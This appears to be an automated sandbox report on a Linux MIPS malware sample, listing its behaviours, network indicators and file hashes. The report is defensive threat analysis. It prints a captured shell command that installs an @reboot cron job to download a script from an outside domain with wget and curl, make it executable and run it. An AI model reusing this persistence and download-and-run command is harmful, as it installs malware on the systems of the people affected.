Analysis Overview
SHA256
0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad
Threat Level: Shows suspicious behavior
The file 0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf was found to be: Shows suspicious behavior.
Malicious Activity Summary
Unexpected DNS network traffic destination
File and Directory Permissions Modification
Renames itself
Creates/modifies Cron job
Changes its process name
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-27 02:02
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-27 02:02
Reported
2024-10-27 02:04
Platform
debian9-mipsbe-20240611-en
Max time kernel
149s
Max time network
139s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/sh | N/A |
Renames itself
| Description | Indicator | Process | Target |
| N/A | N/A | /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf | N/A |
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| Destination IP | 81.169.136.222 | N/A | N/A |
Creates/modifies Cron job
| Description | Indicator | Process | Target |
| File opened for modification | /var/spool/cron/crontabs/tmp.XSZqxU | /usr/bin/crontab | N/A |
Changes its process name
| Description | Indicator | Process | Target |
| Changes the process name, possibly in an attempt to hide itself | [watchdog/0] | /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf | N/A |
Reads runtime system information
Processes
/tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf
[/tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf]
/bin/sh
[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]
/usr/bin/crontab
[crontab -]
/usr/bin/crontab
[crontab -l]
Network
| Country | Destination | Domain | Proto |
| DE | 81.169.136.222:53 | kingstonwikkerink.dyn | udp |
| CZ | 195.133.92.51:17892 | kingstonwikkerink.dyn | tcp |
Files
/var/spool/cron/crontabs/tmp.XSZqxU
| MD5 | 68130ff0ed9a7764cd371c8e6baa6210 |
| SHA1 | d82a9fc5bdb2d9f1cee0bd8458c1f3e94255f3d3 |
| SHA256 | 3bc09503863de8ab831cfaa97b2f03120397fdaa453c39d3db16f32a0124e462 |
| SHA512 | a344d6280beb8e6a2af5740eb256947e5153210f4fb81c28db5d356cf8189e1bb9719e854a8a94b251506393cdcf2ef4e8e039b345dc0d2f951121627e9245aa |